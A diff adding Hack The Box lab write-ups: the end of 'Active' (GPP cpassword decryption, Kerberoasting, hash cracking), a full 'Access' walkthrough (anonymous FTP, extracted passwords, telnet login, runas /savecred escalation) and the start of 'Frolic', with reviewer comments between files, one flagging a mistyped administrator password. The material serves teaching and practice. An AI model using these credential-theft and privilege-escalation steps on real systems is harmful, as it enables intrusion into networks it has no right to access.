+ smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> ls
+ . D 0 Sat Jul 21 12:37:44 2018
+ .. D 0 Sat Jul 21 12:37:44 2018
+ Microsoft D 0 Sat Jul 21 12:37:44 2018
+ Preferences D 0 Sat Jul 21 12:37:44 2018
+ Registry.pol A 2788 Wed Jul 18 20:53:45 2018
+
+ 10459647 blocks of size 4096. 4931286 blocks available
+ smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> cd Preferences
+ smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> ls
+ . D 0 Sat Jul 21 12:37:44 2018
+ .. D 0 Sat Jul 21 12:37:44 2018
+ Groups D 0 Sat Jul 21 12:37:44 2018
+ c
+ 10459647 blocks of size 4096. 4931286 blocks available
+ smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> cd Groups
+ smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
+ . D 0 Sat Jul 21 12:37:44 2018
+ .. D 0 Sat Jul 21 12:37:44 2018
+ Groups.xml A 533 Wed Jul 18 22:46:06 2018
+
+ 10459647 blocks of size 4096. 4931286 blocks available
+ smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
+ getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
+ smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> exit
+
+
+
+Opening up the groups.xml file we see that we have a hashed password to work with.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Active] → cat Groups.xml
+ <****?xml version="1.0" encoding="utf-8"?****> <****Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"> <****User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"> <****Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
+ <****/Groups>
+
+We seem to have a hashed password and a Username : SVC_TGS
+
+
+ cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
+
+
+We will be using the gpp-decrypt tool in order to decrypt the hashed password.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Active] → gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
+ /usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
+ GPPstillStandingStrong2k18
+
+
+And we now have the credentials **SVC_TGS:GPPstillStandingStrong2k18** ! Let's see if we can login.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Active] → smbclient -U svc_tgs //10.10.10.100/Users
+ Unable to initialize messaging context
+ smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+ Enter WORKGROUP\svc_tgs's password:
+ Try "help" to get a list of possible commands.
+ smb: \> whoami
+ whoami: command not found
+ smb: \> id
+ id: command not found
+ smb: \> ls
+ . DR 0 Sat Jul 21 16:39:20 2018
+ .. DR 0 Sat Jul 21 16:39:20 2018
+ Administrator D 0 Mon Jul 16 12:14:21 2018
+ All Users DHS 0 Tue Jul 14 07:06:44 2009
+ Default DHR 0 Tue Jul 14 08:38:21 2009
+ Default User DHS 0 Tue Jul 14 07:06:44 2009
+ desktop.ini AHS 174 Tue Jul 14 06:57:55 2009
+ Public DR 0 Tue Jul 14 06:57:55 2009
+ SVC_TGS D 0 Sat Jul 21 17:16:32 2018
+
+ 10459647 blocks of size 4096. 4924856 blocks available
+ smb: \> cd SVC_TGS
+ smb: \SVC_TGS\> ls
+ . D 0 Sat Jul 21 17:16:32 2018
+ .. D 0 Sat Jul 21 17:16:32 2018
+ Contacts D 0 Sat Jul 21 17:14:11 2018
+ Desktop D 0 Sat Jul 21 17:14:42 2018
+ Downloads D 0 Sat Jul 21 17:14:23 2018
+ Favorites D 0 Sat Jul 21 17:14:44 2018
+ Links D 0 Sat Jul 21 17:14:57 2018
+ My Documents D 0 Sat Jul 21 17:15:03 2018
+ My Music D 0 Sat Jul 21 17:15:32 2018
+ My Pictures D 0 Sat Jul 21 17:15:43 2018
+ My Videos D 0 Sat Jul 21 17:15:53 2018
+ Saved Games D 0 Sat Jul 21 17:16:12 2018
+ Searches D 0 Sat Jul 21 17:16:24 2018
+
+ 10459647 blocks of size 4096. 4924856 blocks available
+ smb: \SVC_TGS\> cd Desktop
+ smb: \SVC_TGS\Desktop\> ls
+ . D 0 Sat Jul 21 17:14:42 2018
+ .. D 0 Sat Jul 21 17:14:42 2018
+ user.txt A 34 Sat Jul 21 17:06:25 2018
+
+ 10459647 blocks of size 4096. 4924856 blocks available
+ smb: \SVC_TGS\Desktop\> get user.txt
+ getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
+ smb: \SVC_TGS\Desktop\> exit
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Active] → cat user.txt
+ 86XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to log in as the user SVC_TGS and print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Earlier our nmap scan picked up the 88th port running the kerberos service. so we will run the python script **kerberoastv2.py**
+
+
+ λ root [ 10.10.14.48/23 ] [_HTB/Active/PyKerberoast] at master ✔
+ → python2 kerberoastv2.py -a 10.10.10.100 -b cn=users,dc=active,dc=htb -d active -u svc_tgs -p GPPstillStandingStrong2k18 > HASH.txt
+
+ λ root [ 10.10.14.48/23 ] [_HTB/Active/PyKerberoast] at master ✔
+ → cat HASH.txt
+
+ [+]Starting...
+ $krb5tgs$18$*krbtgt$ACTIVE.HTB$spn*$cabf481b2b4dbd9567c5bee15e9d2ec9$04f2407e7fadab18a8f8ebda0e66af92e91c305098340e701383738a9cd317b15024815917af864e679ae02f8b610e18842308a54a9f0a2095ab688a972c5e03903f5d2cbf2d72cc5894ff6fa45413b95a1c94ee8fd1c9e8990c95748ba93a83bc078b3653b678a60fa0eb42cdaccdb3b4e5d5d97925676059c5b3495ce37a1fc964cf7cdeba452811d52a103633ffc5033709c3a2ac0f4f0a6aa06700b2817956c37c2f20e4ef5684b41d3f87e3f7fd80ed51088ef648f874b5fe113b5da0ebe5c7e77d63945ca190bb1dab377f75f6da85cbc261635fefdd42e621ac711c26c87d99b761941330e010fec48fd06219cd1aa7a8e91c9b0f36728ca30e68128db767e2e54c57d185b0700c03e7eb66fa62903971cdca7d481e4d4db09cc22a943ddb8ead77b4a2f2fc5cac6f34a6af8e796b5dd9f2e4310af99271a64af70c2c3aacfb8820b805d8efb3899e7a4d22c5adbf33f970e8fa7ce8ea79ad83a265aa3a4af2464d7cb296333199251a27f2fc189935f87c116e9143accd254ba4fb5d2a6f80af535076afbf8a89bea83941f703d312605d7fadc5d6583c9a86463ddc69165bdb0aabeab30edee51032dc160e3e349eb2f0c465f891015b7a127c9ef47949fdba2c1e2392d0cee6d03f54e5d36e63be681d1d2ad084c0f892b447352039488f21c184d7d0d5d68c0f15197579217ac48d3f1770710e5e0af95140d7394aae11371fd098b9591a1f6de4d4448db180a612917a8b0309e1b1a443d52d40f974e1036406c0aacf46b3be2286408cacd0c55a0e3146e7226cf6ab9c5d1b2af6939eac9c750c652f02925ab0549c3fd56f3655ceb37ec368dc24c034e6030a1b25dac3691e80098547a08b638560f2ffd37dcde83df28152fcbc9a93d9ef11a2e84f5b8efd3c8489983dceb394d22969d9c86b06af4b6633c55d86f61d1feac5dd4c541fa4e405b2b2e5fc41622833a45026dfef1e7a04b0577f2b5229b68e12af85af2cc074c3aae267c1c942cea9bcb21640bd2d0fe75996f93623e5cbaab186b7cedef4c1db1240b5c8cbb486f50bc7fafed38cd40a7605a6511d0cd393c8aa1c0387c7df9bd8c9a3f3af3eb2fe6341a88c6fac220f53725cd574f92c75e1f1a47be01a1a6bbf865fef2a681b981f2a2cf126797b7fcab95315c430f46e6140266d693e41dfb964c5f80e88ebb6c04cbe6299ef0f5cab31e8e75278474633d33251029cf0cdd2c40fe4678581ecdd193b7eac40
+
+
+
+now we have a ticket for the admin user ! we just need to run john in combination with rockyou.txt to find the password.
+
+
+ john -w=rockyou.txt HASH.txt
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
+ Will run 2 OpenMP threads
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+
+ **Ticketmaster1968 (?)**
+
+ 1g 0:00:00:39 DONE (2019-11-28 13:34) 0.02515g/s 265093p/s 265093c/s 265093C/s Tiffani1432..Tiago_18
+ Use the "--show" option to display all of the cracked passwords reliably
+ Session completed
+
+
+
+Now we have the Administrator password ! Let's try to login using our newly acquired credentials : **Administrator:Ticketmaster1986**
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Active] → smbclient -U administrator //10.10.10.100/Users
+ Unable to initialize messaging context
+ smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+ Enter WORKGROUP\administrator's password:
+ Try "help" to get a list of possible commands.
+ smb: \> ls
+ . DR 0 Sat Jul 21 16:39:20 2018
+ .. DR 0 Sat Jul 21 16:39:20 2018
+ Administrator D 0 Mon Jul 16 12:14:21 2018
+ All Users DHS 0 Tue Jul 14 07:06:44 2009
+ Default DHR 0 Tue Jul 14 08:38:21 2009
+ Default User DHS 0 Tue Jul 14 07:06:44 2009
+ desktop.ini AHS 174 Tue Jul 14 06:57:55 2009
+ Public DR 0 Tue Jul 14 06:57:55 2009
+ SVC_TGS D 0 Sat Jul 21 17:16:32 2018
+
+ 10459647 blocks of size 4096. 4924582 blocks available
+ smb: \> cd Administrator
+ smb: \Administrator\> ls
+ . D 0 Mon Jul 16 12:14:21 2018
+ .. D 0 Mon Jul 16 12:14:21 2018
+ AppData DH 0 Mon Jul 16 12:14:15 2018
+ Application Data DHS 0 Mon Jul 16 12:14:15 2018
+ Contacts DR 0 Mon Jul 30 15:50:10 2018
+ Cookies DHS 0 Mon Jul 16 12:14:15 2018
+ Desktop DR 0 Mon Jul 30 15:50:10 2018
+ Documents DR 0 Mon Jul 30 15:50:10 2018
+ Downloads DR 0 Mon Jul 30 15:50:27 2018
+ Favorites DR 0 Mon Jul 30 15:50:10 2018
+ Links DR 0 Mon Jul 30 15:50:10 2018
+ Local Settings DHS 0 Mon Jul 16 12:14:15 2018
+ Music DR 0 Mon Jul 30 15:50:10 2018
+ My Documents DHS 0 Mon Jul 16 12:14:15 2018
+ NetHood DHS 0 Mon Jul 16 12:14:15 2018
+ NTUSER.DAT AHS 524288 Mon Jul 30 19:21:29 2018
+ ntuser.dat.LOG1 AHS 262144 Thu Nov 28 11:26:05 2019
+ ntuser.dat.LOG2 AHS 0 Mon Jul 16 12:14:09 2018
+ NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf AHS 65536 Mon Jul 16 12:14:15 2018
+ NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Mon Jul 16 12:14:15 2018
+ NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Mon Jul 16 12:14:15 2018
+ ntuser.ini HS 20 Mon Jul 16 12:14:15 2018
+ Pictures DR 0 Mon Jul 30 15:50:10 2018
+ PrintHood DHS 0 Mon Jul 16 12:14:15 2018
+ Recent DHS 0 Mon Jul 16 12:14:15 2018
+ Saved Games DR 0 Mon Jul 30 15:50:10 2018
+ Searches DR 0 Mon Jul 30 15:50:10 2018
+ SendTo DHS 0 Mon Jul 16 12:14:15 2018
+ Start Menu DHS 0 Mon Jul 16 12:14:15 2018
+ Templates DHS 0 Mon Jul 16 12:14:15 2018
+ Videos DR 0 Mon Jul 30 15:50:10 2018
+
+ 10459647 blocks of size 4096. 4924582 blocks available
+ smb: \Administrator\> cd Desktop
+ smb: \Administrator\Desktop\> ls
+ . DR 0 Mon Jul 30 15:50:10 2018
+ .. DR 0 Mon Jul 30 15:50:10 2018
+ desktop.ini AHS 282 Mon Jul 30 15:50:10 2018
+ root.txt A 34 Sat Jul 21 17:06:07 2018
+
+ 10459647 blocks of size 4096. 4924582 blocks available
+ smb: \Administrator\Desktop\> get root.txt
+ getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
+ smb: \Administrator\Desktop\> exit
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Active] → cat root.txt
+ b5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it ! The credentials gave us access to the Administrator User, and therefore we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
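Review bot: the credential printed at the end of the Active writeup contradicts the cracking output it follows: john reports `Ticketmaster1968 (?)`, but the prose two paragraphs later says `Administrator:Ticketmaster1986` (digits transposed). Since the smbclient session that follows succeeds, the typed value should be corrected to `Ticketmaster1968` so a reader following along does not retry the wrong password. A smaller point: the ticket header reads `$krb5tgs$18$` while john loads it as `Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]`; one sentence on why the two etype labels differ would spare readers the confusion when they check which encryption type was actually cracked.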
diff --git a/Easy/22.md b/Easy/22.md
new file mode 100644
index 0000000..b7ef1fb
--- /dev/null
+++ b/Easy/22.md
@@ -0,0 +1,382 @@
+# Access Writeup
+
+
+
+## Introduction :
+
+Access is an easy Windows box that was released back in September 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Access ]
+ → nmap 10.10.10.98 -F
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-03 11:18 CET
+ Nmap scan report for 10.10.10.98
+ Host is up (0.086s latency).
+ Not shown: 97 filtered ports
+ PORT STATE SERVICE
+ 21/tcp open ftp
+ 23/tcp open telnet
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 2.82 seconds
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Access ]
+ → nmap -sCV 10.10.10.98
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-03 12:30 CET
+ Nmap scan report for 10.10.10.98
+ Host is up (0.090s latency).
+ Not shown: 997 filtered ports
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp Microsoft ftpd
+ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ |_Cant get directory listing: PASV failed: 425 Cannot open data connection.
+ | ftp-syst:
+ |_ SYST: Windows_NT
+ 23/tcp open telnet?
+ 80/tcp open http Microsoft IIS httpd 7.5
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ |_http-server-header: Microsoft-IIS/7.5
+ |_http-title: MegaCorp
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 192.73 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+We see that our previous nmap scan came back with the ftp port opened, which seems to allow for anonymous logins so let's connect to it and see what we can do here.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ → ftp 10.10.10.98
+ Connected to 10.10.10.98.
+ 220 Microsoft FTP Service
+ Name (10.10.10.98:nihilist): anonymous
+ 331 Anonymous access allowed, send identity (e-mail name) as password.
+ Password:
+ 230 User logged in.
+ Remote system type is Windows_NT.
+ ftp> ls
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 08-23-18 08:16PM <****DIR> Backups
+ 08-24-18 09:00PM <****DIR> Engineer
+ 226 Transfer complete.
+
+We have been able to login ! now let's see what lies within the Engineer and Backups folders.
+
+
+ ftp> cd backups
+ 250 CWD command successful.
+ ftp> ls
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 08-23-18 08:16PM 5652480 backup.mdb
+ 226 Transfer complete.
+ ftp> get backup.mdb
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ cd ..
+ WARNING! 28296 bare linefeeds received in ASCII mode
+ File may not have transferred correctly.
+ 226 Transfer complete.
+ 5652480 bytes received in 10.4 seconds (531 kbytes/s)
+ ftp> cd ..
+ 250 CWD command successful.
+ ftp> ls
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 08-23-18 08:16PM <****DIR> Backups
+ 08-24-18 09:00PM <****DIR> Engineer
+ 226 Transfer complete.
+ ftp> cd Engineer
+ 250 CWD command successful.
+ ftp> ls
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 08-24-18 12:16AM 10870 Access Control.zip
+ 226 Transfer complete.
+ ftp> get Access\ Control.zip
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ WARNING! 45 bare linefeeds received in ASCII mode
+ File may not have transferred correctly.
+ 226 Transfer complete.
+ 10870 bytes received in 0.247 seconds (43 kbytes/s)
+ ftp> ls
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 08-24-18 12:16AM 10870 Access Control.zip
+ 226 Transfer complete.
+ ftp> quit
+ 221 Goodbye.
+
+We have been able to download a zip file named "Access Control" and a mdb file named "Backup" let's see if we can extract the contents of the zip file using the 7z command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Access ]
+ → 7z x Access\ Control.zip
+
+ 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
+ p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Pentium(R) Silver N5000 CPU @ 1.10GHz (706A1),ASM,AES-NI)
+
+ Scanning the drive for archives:
+ 1 file, 10870 bytes (11 KiB)
+
+ Extracting archive: Access Control.zip
+ --
+ Path = Access Control.zip
+ Type = zip
+ Physical Size = 10870
+
+
+ Enter password (will not be echoed):
+ ERROR: Wrong password : Access Control.pst
+
+ Sub items Errors: 1
+
+ Archives with Errors: 1
+
+ Sub items Errors: 1
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Access ]
+ → ls
+ 'Access Control.pst' 'Access Control.zip' backup.mdb
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Access ]
+ → file backup.mdb
+ backup.mdb: Microsoft Access Database
+
+
+We use a hex editor to see that we find a suspect string, which is actually a password to work with : access4u@security
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Access ]
+ → 7z x Access\ Control.zip -paccess4u@security
+
+ 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
+ p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Pentium(R) Silver N5000 CPU @ 1.10GHz (706A1),ASM,AES-NI)
+
+ Scanning the drive for archives:
+ 1 file, 10870 bytes (11 KiB)
+
+ Extracting archive: Access Control.zip
+ --
+ Path = Access Control.zip
+ Type = zip
+ Physical Size = 10870
+
+ Everything is Ok
+
+ Size: 271360
+ Compressed: 10870
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Access ]
+ → ls
+ 'Access Control.pst' 'Access Control.zip' backup.mdb
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Access ]
+ → file Access\ Control.pst
+ Access Control.pst: Microsoft Outlook email folder (>=2003)
+
+
+
+it worked ! now we have a new file to work with : Access Control.pst Which seems to be a MS Outlook email folder. We simply need to use a pst-reading tool named [readpst](https://www.five-ten-sg.com/libpst/rn01re01.html), which is basically made to extract a the .mbox file out of any .pst formatted-file. Which then in turn gives us yet another password to work with : 4Cc3ssC0ntr0ller. We now have potential credentials : security:4Cc3ssC0ntr0ller
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Access] → telnet 10.10.10.98
+ Trying 10.10.10.98...
+ Connected to 10.10.10.98.
+ Escape character is '^]'.
+ Welcome to Microsoft Telnet Service
+
+ login: security
+ password:
+
+ *===============================================================
+ Microsoft Telnet Server.
+ *===============================================================
+ C:\Users\security>dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9C45-DBF0
+
+ Directory of C:\Users\security
+
+ 08/23/2018 10:52 PM <****DIR> .
+ 08/23/2018 10:52 PM <****DIR> ..
+ 08/24/2018 07:37 PM <****DIR> .yawcam
+ 08/21/2018 10:35 PM <****DIR> Contacts
+ 08/28/2018 06:51 AM <****DIR> Desktop
+ 08/21/2018 10:35 PM <****DIR> Documents
+ 08/21/2018 10:35 PM <****DIR> Downloads
+ 08/21/2018 10:35 PM <****DIR> Favorites
+ 08/21/2018 10:35 PM <****DIR> Links
+ 08/21/2018 10:35 PM <****DIR> Music
+ 08/21/2018 10:35 PM <****DIR> Pictures
+ 08/21/2018 10:35 PM <****DIR> Saved Games
+ 08/21/2018 10:35 PM <****DIR> Searches
+ 08/24/2018 07:39 PM <****DIR> Videos
+ 0 File(s) 0 bytes
+ 14 Dir(s) 16,771,465,216 bytes free
+
+ C:\Users\security>
+
+and we're in ! We have been to use the aforementionned credentials when we tried to login through the telnet service on port 23.
+
+
+ C:\Users\security>cd Desktop
+
+ C:\Users\security\Desktop>type user.txt
+ ffXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Let's have a look around the telnet service to see what we can work with.
+
+
+ C:\Users>dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9C45-DBF0
+
+ Directory of C:\Users
+
+ 08/21/2018 10:31 PM <****DIR> .
+ 08/21/2018 10:31 PM <****DIR> ..
+ 08/23/2018 11:46 PM <****DIR> Administrator
+ 07/14/2009 04:57 AM <****DIR> Public
+ 08/23/2018 10:52 PM <****DIR> security
+ 0 File(s) 0 bytes
+ 5 Dir(s) 16,771,461,120 bytes free
+
+ C:\Users>cd Public
+
+ C:\Users\Public>dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9C45-DBF0
+
+ Directory of C:\Users\Public
+
+ 07/14/2009 04:57 AM <****DIR> .
+ 07/14/2009 04:57 AM <****DIR> ..
+ 07/14/2009 05:06 AM <****DIR> Documents
+ 07/14/2009 04:57 AM <****DIR> Downloads
+ 07/14/2009 04:57 AM <****DIR> Music
+ 07/14/2009 04:57 AM <****DIR> Pictures
+ 07/14/2009 04:57 AM <****DIR> Videos
+ 0 File(s) 0 bytes
+ 7 Dir(s) 16,771,461,120 bytes free
+
+ C:\Users\Public>cd
+ C:\Users\Public
+
+ C:\Users\Public>dir \a
+ Volume in drive C has no label.
+ Volume Serial Number is 9C45-DBF0
+
+ Directory of C:\
+
+ File Not Found
+
+ C:\Users\Public>cd /a
+ The system cannot find the path specified.
+
+ C:\Users\Public>dir /a
+ Volume in drive C has no label.
+ Volume Serial Number is 9C45-DBF0
+
+ Directory of C:\Users\Public
+
+ 07/14/2009 04:57 AM <****DIR> .
+ 07/14/2009 04:57 AM <****DIR> ..
+ 08/28/2018 06:51 AM <****DIR> Desktop
+ 07/14/2009 04:57 AM 174 desktop.ini
+ 07/14/2009 05:06 AM <****DIR> Documents
+ 07/14/2009 04:57 AM <****DIR> Downloads
+ 07/14/2009 02:34 AM <****DIR> Favorites
+ 07/14/2009 04:57 AM <****DIR> Libraries
+ 07/14/2009 04:57 AM <****DIR> Music
+ 07/14/2009 04:57 AM <****DIR> Pictures
+ 07/14/2009 04:57 AM <****DIR> Videos
+ 1 File(s) 174 bytes
+ 10 Dir(s) 16,771,461,120 bytes free
+
+ C:\Users\Public>cd Desktop
+
+ C:\Users\Public\Desktop>dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9C45-DBF0
+
+ Directory of C:\Users\Public\Desktop
+
+ 08/22/2018 09:18 PM 1,870 ZKAccess3.5 Security System.lnk
+ 1 File(s) 1,870 bytes
+ 0 Dir(s) 16,771,461,120 bytes free
+
+Looks like we have a shortcut file we can work with, the (lnk) stands for link file.
+
+
+ C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
+ L�F�@ ��7���7���#�P/P�O� �:i�+00�/C:\R1M�:Windows��:��M�:*wWindowsV1MV�System32��:��MV�*�System32X2P�:�
+ runas.exe��:1��:1�*Yrunas.exeL-K��E�C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%�
+ �wN���]N�D.��Q���`�Xaccess�_���8{E�3
+ O�j)�H���
+ )ΰ[�_���8{E�3
+ O�j)�H���
+ )ΰ[� ��1SPS�XF�L8C���&�m�e*S-1-5-21-953262931-566350628-63446256-500
+
+
+
+This looks like an attempt at creating a password backup file using the runas command.
+
+
+ C:\Users\Public\Desktop>runas /savecred /user:ACCESS\Administrator "cmd.exe /C type C:\Users\Administrator\Desktop\root.txt > C:\Users\security\Searches\out.txt"
+
+ C:\Users\Public\Desktop>type out.txt
+ The system cannot find the file specified.
+
+ C:\Users\Public\Desktop>dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9C45-DBF0
+
+ Directory of C:\Users\Public\Desktop
+
+ 08/22/2018 09:18 PM 1,870 ZKAccess3.5 Security System.lnk
+ 1 File(s) 1,870 bytes
+ 0 Dir(s) 16,771,452,928 bytes free
+
+ C:\Users\Public\Desktop>cd ..
+
+ C:\Users\Public>cd ..
+
+ C:\Users>cd Security
+
+ C:\Users\security>cd Searches
+
+ C:\Users\security\Searches>type out.txt
+
+ 6eXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We have been able to print out the root flag !
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
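Review bot: the reading of the shortcut at "This looks like an attempt at creating a password backup file using the runas command" is wrong and should be rewritten: the `.lnk` dump shows the target `runas.exe /user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"`, i.e. a shortcut that launches the ZKAccess application as Administrator with a credential previously saved via `/savecred` for the `security` account. That stored privileged credential is the real finding, and it is exactly why the later `runas /savecred /user:ACCESS\Administrator "cmd.exe /C type ..."` runs without prompting for a password; the writeup should state this, along with the defender's takeaway that an administrator credential should never be left saved with `/savecred` on a low-privilege user's profile. Two documentation gaps in the same file: `access4u@security` is said to come from a hex editor pass over `backup.mdb`, and `4Cc3ssC0ntr0ller` from running readpst on `Access Control.pst`, but neither command nor its output is shown, so both steps are unreproducible as written. Minor: "extract a the .mbox", "aforementionned" and "We have been to use" (missing "able") want fixing.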
diff --git a/Easy/23.md b/Easy/23.md
new file mode 100644
index 0000000..0e6e734
--- /dev/null
+++ b/Easy/23.md
@@ -0,0 +1,802 @@
+# Frolic Writeup
+
+
+
+## Introduction :
+
+Frolic is an easy Linux box released back in October 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ → nmap -F 10.10.10.111
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-04 10:29 CET
+ Nmap scan report for 10.10.10.111
+ Host is up (0.062s latency).
+ Not shown: 96 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 139/tcp open netbios-ssn
+ 445/tcp open microsoft-ds
+ 9999/tcp open abyss
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ →nmap -sC -sV 10.10.10.111 -p 22,139,445,9999
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-04 10:29 CET
+ Nmap scan report for 10.10.10.111
+ Host is up (0.066s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
+ | 256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
+ |_ 256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
+ 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
